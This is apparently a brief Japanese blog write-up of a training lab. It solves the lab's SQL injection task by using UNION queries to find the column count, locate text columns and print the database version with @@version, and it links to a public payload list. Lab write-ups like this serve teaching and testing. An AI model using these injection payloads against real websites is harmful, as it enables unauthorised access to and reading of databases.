Hello there, ('ω')ノ

 

MySQLとMicrosoftのデータベースタイプとバージョンのクエリを。

このラボには、SQLインジェクションの脆弱性があって。

UNION攻撃を使用して、挿入されたクエリから結果を取得できるらしく。

 

まずは、ページにアクセスして。

 

 

まずは、カラム数の確認から。

　'+UNION+SELECT+NULL,NULL--

 

 

コメントタイプを変更すると正常なレスポンスが返ってきて。

　'+UNION+SELECT+NULL,NULL#

 

 

次にカラムのデータ形式でテキストデータを確認して。

　'+UNION+SELECT+'abc','def'#

 

 

最後に下記のペイロードでデータベースのバージョンを表示して。

　'+UNION+SELECT+@@version,NULL#

 

 

クリアできた。

 

 

SQLインジェクションのペイロードもWEB上にあって。

これらを参考に組み立てていけばよいかと。

　https://github.com/payloadbox/sql-injection-payload-list

 

 

Best regards, (^^ゞ